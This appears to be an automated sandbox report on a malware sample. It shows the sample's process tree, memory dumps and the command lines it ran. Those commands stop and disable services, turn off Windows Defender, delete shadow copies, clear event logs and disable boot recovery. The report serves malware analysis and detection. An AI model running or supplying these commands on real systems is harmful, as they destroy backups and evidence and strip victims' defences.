PID 1668 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1328 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1328 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1328 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1380 wrote to memory of 1072 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1380 wrote to memory of 1072 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1380 wrote to memory of 1072 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 664 wrote to memory of 1332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 664 wrote to memory of 1332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 664 wrote to memory of 1332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 452 wrote to memory of 752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 452 wrote to memory of 752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 452 wrote to memory of 752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 956 wrote to memory of 1092 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 956 wrote to memory of 1092 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 956 wrote to memory of 1092 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1052 wrote to memory of 1488 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1052 wrote to memory of 1488 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1052 wrote to memory of 1488 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1100 wrote to memory of 1532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1100 wrote to memory of 1532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1100 wrote to memory of 1532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/1548-55-0x0000000000000000-mapping.dmp

memory/648-56-0x0000000000000000-mapping.dmp

memory/1328-57-0x0000000000000000-mapping.dmp

memory/1632-58-0x0000000000000000-mapping.dmp

memory/1380-59-0x0000000000000000-mapping.dmp

memory/1072-60-0x0000000000000000-mapping.dmp

memory/664-61-0x0000000000000000-mapping.dmp

memory/1332-62-0x0000000000000000-mapping.dmp

memory/452-63-0x0000000000000000-mapping.dmp

memory/752-64-0x0000000000000000-mapping.dmp

memory/956-65-0x0000000000000000-mapping.dmp

memory/1092-66-0x0000000000000000-mapping.dmp

memory/1052-67-0x0000000000000000-mapping.dmp

memory/1488-68-0x0000000000000000-mapping.dmp

memory/1100-69-0x0000000000000000-mapping.dmp

memory/1532-70-0x0000000000000000-mapping.dmp

memory/1660-71-0x0000000000000000-mapping.dmp

memory/984-72-0x0000000000000000-mapping.dmp

memory/1744-73-0x0000000000000000-mapping.dmp

memory/572-74-0x0000000000000000-mapping.dmp

memory/1636-75-0x0000000000000000-mapping.dmp

memory/1148-76-0x0000000000000000-mapping.dmp

memory/1984-77-0x0000000000000000-mapping.dmp

memory/1760-78-0x0000000000000000-mapping.dmp

memory/1312-79-0x0000000000000000-mapping.dmp

memory/1580-80-0x0000000000000000-mapping.dmp

memory/1680-81-0x0000000000000000-mapping.dmp

memory/516-82-0x0000000000000000-mapping.dmp

memory/1632-83-0x0000000000000000-mapping.dmp

memory/1560-84-0x0000000000000000-mapping.dmp

memory/1964-85-0x0000000000000000-mapping.dmp

memory/916-86-0x0000000000000000-mapping.dmp

memory/944-87-0x0000000000000000-mapping.dmp

memory/872-88-0x0000000000000000-mapping.dmp

memory/1828-89-0x0000000000000000-mapping.dmp

memory/1532-90-0x0000000000000000-mapping.dmp

memory/1176-91-0x0000000000000000-mapping.dmp

memory/1844-92-0x0000000000000000-mapping.dmp

memory/1712-93-0x0000000000000000-mapping.dmp

memory/1936-94-0x0000000000000000-mapping.dmp

memory/584-95-0x0000000000000000-mapping.dmp

memory/900-96-0x0000000000000000-mapping.dmp

memory/1592-97-0x0000000000000000-mapping.dmp

memory/268-98-0x0000000000000000-mapping.dmp

memory/1480-99-0x0000000000000000-mapping.dmp

memory/892-100-0x0000000000000000-mapping.dmp

memory/812-101-0x0000000000000000-mapping.dmp

memory/1772-102-0x0000000000000000-mapping.dmp

memory/1496-103-0x0000000000000000-mapping.dmp

memory/1752-104-0x0000000000000000-mapping.dmp

memory/1696-105-0x0000000000000000-mapping.dmp

memory/676-106-0x0000000000000000-mapping.dmp

memory/716-107-0x0000000000000000-mapping.dmp

memory/1980-108-0x0000000000000000-mapping.dmp

memory/340-109-0x0000000000000000-mapping.dmp

memory/1216-110-0x0000000000000000-mapping.dmp

memory/1256-111-0x0000000000000000-mapping.dmp

memory/1708-112-0x0000000000000000-mapping.dmp

memory/328-113-0x0000000000000000-mapping.dmp

memory/328-114-0x000007FEFC401000-0x000007FEFC403000-memory.dmp

memory/1908-115-0x0000000000000000-mapping.dmp

memory/1940-117-0x0000000000000000-mapping.dmp

memory/964-119-0x0000000000000000-mapping.dmp

memory/1552-120-0x0000000000000000-mapping.dmp

memory/1396-121-0x0000000000000000-mapping.dmp

memory/1956-124-0x00000000026F0000-0x00000000026F2000-memory.dmp

memory/1956-125-0x00000000026F2000-0x00000000026F4000-memory.dmp

memory/1956-126-0x00000000026F4000-0x00000000026F7000-memory.dmp

memory/1956-123-0x000007FEF34E0000-0x000007FEF403D000-memory.dmp

memory/1956-127-0x00000000026FB000-0x000000000271A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c015d76fd1f7a457aaebce0d13c2536f
SHA1 5e8948252f436f59f06609e965a9902f9bc19593
SHA256 6d36bdc3d258c6a88907f13c074e87af6dd8b6bd1cfcad8617e1b00919750264
SHA512 c2fc649b05792922ca20650145544b65b43e20410c3a81d7e9c39947ded3b5702f9d67bf5c834d3cd5e390938b928cbd789f55041f2cf7eccf54d1ae1ff138b0

memory/1500-130-0x000007FEF2B40000-0x000007FEF369D000-memory.dmp

memory/1500-132-0x0000000002870000-0x0000000002872000-memory.dmp

memory/1500-133-0x0000000002872000-0x0000000002874000-memory.dmp

memory/1500-134-0x0000000002874000-0x0000000002877000-memory.dmp

memory/1500-131-0x000000001B7D0000-0x000000001BACF000-memory.dmp

memory/1500-135-0x000000000287B000-0x000000000289A000-memory.dmp